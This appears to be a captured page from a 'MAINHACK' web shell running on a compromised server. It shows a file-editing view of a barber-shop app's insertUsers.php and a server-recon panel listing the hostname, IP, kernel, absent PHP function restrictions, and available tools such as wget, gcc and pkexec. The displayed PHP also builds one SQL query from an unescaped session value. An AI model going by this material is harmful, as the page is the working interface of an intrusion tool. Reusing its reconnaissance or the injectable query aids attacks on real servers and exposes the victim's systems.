[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: insertUsers.php
<?php include("db.php"); $timezome = 'Africa/Africa'; date_default_timezone_set($timezome); $username = $_SESSION['username_Xw211qAAsq4']; $shopname = $_SESSION['business_name_Xw211qAAsq4']; $username = filter_input(INPUT_POST, 'username', FILTER_SANITIZE_STRING); $username = htmlspecialchars($username, ENT_QUOTES, 'UTF-8'); $full_name = filter_input(INPUT_POST, 'full_name', FILTER_SANITIZE_STRING); $full_name = htmlspecialchars($full_name, ENT_QUOTES, 'UTF-8'); $email = filter_input(INPUT_POST, 'email', FILTER_SANITIZE_STRING); $email = htmlspecialchars($email, ENT_QUOTES, 'UTF-8'); $phone_number = filter_input(INPUT_POST, 'phone_number', FILTER_SANITIZE_STRING); $phone_number = htmlspecialchars($phone_number, ENT_QUOTES, 'UTF-8'); $password = filter_input(INPUT_POST, 'password', FILTER_SANITIZE_STRING); $password = htmlspecialchars($password, ENT_QUOTES, 'UTF-8'); $status = filter_input(INPUT_POST, 'status', FILTER_SANITIZE_STRING); $status = htmlspecialchars($status, ENT_QUOTES, 'UTF-8'); if(empty($username)){ echo json_encode(['status' => 'error', 'message' => 'Username is required']); exit; } elseif(empty($full_name)){ echo json_encode(['status' => 'error', 'message' => 'Full name is required']); exit; } elseif(empty($email)){ echo json_encode(['status' => 'error', 'message' => 'Email is required']); exit; } elseif(empty($password)){ echo json_encode(['status' => 'error', 'message' => 'Password is required']); exit; } else { $options = ['cost' => 12,]; $hashed_password = password_hash($password, PASSWORD_BCRYPT, $options); $validation_code = md5($email . microtime()); $sele = mysqli_query($new,"SELECT * FROM barber_admin WHERE business_name = '$shopname' and account_type = 'Owner'"); $fetch = mysqli_fetch_array($sele); $location = $fetch['location']; $forgot_pass_expire_time = $fetch['forgot_pass_expire_time']; $expired = $fetch['expired']; $open_clode_time = $fetch['open_clode_time']; $account_status = $fetch['account_status']; $account_type = 'Admin'; $stmt = $con->prepare("insert into barber_admin (username,email,full_name,password,validation_code,active,forgot_pass_expire_time,phone,business_name,location,account_type,expired,open_clode_time,account_status) values(?,?,?,?,?,?,?,?,?,?,?,?,?,?)"); $stmt->execute(array($username,$email,$full_name,$hashed_password,$validation_code,$status,$forgot_pass_expire_time,$phone_number,$shopname,$location,$account_type,$expired,$open_clode_time,$account_status)); echo json_encode(['status' => 'success', 'message' => 'Account manager is added']); exit; } ?>
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.8 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002